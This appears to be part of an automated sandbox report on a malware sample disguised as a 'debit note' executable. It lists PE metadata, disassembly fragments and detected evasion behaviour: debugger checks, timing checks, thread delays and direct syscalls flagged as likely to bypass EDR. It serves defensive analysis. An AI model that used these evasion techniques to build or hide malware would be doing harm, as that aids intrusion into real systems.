Source:	Binary string: svchost.pdb source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2360502532.000000001584C000.00000004.80000000.00040000.00000000.sdmp

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418099 push ds; retf	1_2_0041809D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00405146 push 77A95BDBh; iretd	1_2_0040514B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D2DD push esp; retf	1_2_0040D301
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418B58 pushfd ; iretd	1_2_00418B63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403320 push eax; ret	1_2_00403322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404C21 push ds; iretd	1_2_00404C3C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00424DA3 push ss; ret	1_2_00424DC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041E686 push cs; iretd	1_2_0041E68D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414740 push esp; ret	1_2_00414773
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D76C push 71D13F2Ch; iretd	1_2_0040D775
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401771 push AEE129C4h; iretd	1_2_00401776
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402FD4 push ss; retf	1_2_00402FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040BFE1 pushfd ; retf	1_2_0040BFE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx	1_2_036309B6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035909AD push ecx; mov dword ptr [esp], ecx	6_2_035909B6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A401B5 push ds; iretd	6_2_00A401B6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A3B363 push cs; iretd	6_2_00A3B36A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A31420 push esp; ret	6_2_00A31450
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A218FE push ds; iretd	6_2_00A21919
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A35835 pushfd ; iretd	6_2_00A35840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A41A80 push ss; ret	6_2_00A41AA2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A39A70 push esp; retf 29BFh	6_2_00A39B95
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A3BBB3 push ss; iretd	6_2_00A3BBBF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A28CBE pushfd ; retf	6_2_00A28CBF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A34D76 push ds; retf	6_2_00A34D7A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A21E23 push 77A95BDBh; iretd	6_2_00A21E28
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03365242 push eax; ret	6_2_03365244
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03355156 push ecx; iretd	6_2_0335515E
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_033560E9 push ebx; retf	6_2_033560ED
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_033559CA push FFFFFFC1h; iretd	6_2_033559CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_03355E38 push esp; retf	6_2_03355E39

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	API/Special instruction interceptor: Address: 3D4025C
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_036AD1C0 rdtsc

1_2_036AD1C0

Source: C:\Windows\SysWOW64\xcopy.exe	Window / User API: threadDelayed 1795			Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Window / User API: threadDelayed 8179			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\xcopy.exe	API coverage: 3.1 %

Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136	Thread sleep count: 1795 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136	Thread sleep time: -3590000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136	Thread sleep count: 8179 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 1136	Thread sleep time: -16358000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe TID: 2260	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\xcopy.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 6_2_00A3C330 FindFirstFileW,FindNextFileW,FindClose,

6_2_00A3C330

Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: PMZSowQBcVJqD.exe, 00000007.00000002.4096103511.000000000135F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2362063996.000002B45583C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_036AD1C0 rdtsc

1_2_036AD1C0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417643 LdrLoadDll,

1_2_00417643

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF367 mov eax, dword ptr fs:[00000030h]	1_2_036EF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]	1_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705341 mov eax, dword ptr fs:[00000030h]	1_2_03705341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]	1_2_03629353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]	1_2_03629353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F32A mov eax, dword ptr fs:[00000030h]	1_2_0365F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03627330 mov eax, dword ptr fs:[00000030h]	1_2_03627330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]	1_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]	1_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF3E6 mov eax, dword ptr fs:[00000030h]	1_2_036EF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037053FC mov eax, dword ptr fs:[00000030h]	1_2_037053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]	1_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]	1_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]	1_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]	1_2_036EB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036533A5 mov eax, dword ptr fs:[00000030h]	1_2_036533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]	1_2_036633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]	1_2_036633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370539D mov eax, dword ptr fs:[00000030h]	1_2_0370539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]	1_2_036FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]	1_2_036FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]	1_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03659274 mov eax, dword ptr fs:[00000030h]	1_2_03659274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]	1_2_03671270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]	1_2_03671270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]	1_2_03629240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]	1_2_03629240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366724D mov eax, dword ptr fs:[00000030h]	1_2_0366724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]	1_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]	1_2_036EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]	1_2_036EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]	1_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705227 mov eax, dword ptr fs:[00000030h]	1_2_03705227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]	1_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]	1_2_03667208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]	1_2_03667208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037052E2 mov eax, dword ptr fs:[00000030h]	1_2_037052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF2F8 mov eax, dword ptr fs:[00000030h]	1_2_036EF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036292FF mov eax, dword ptr fs:[00000030h]	1_2_036292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
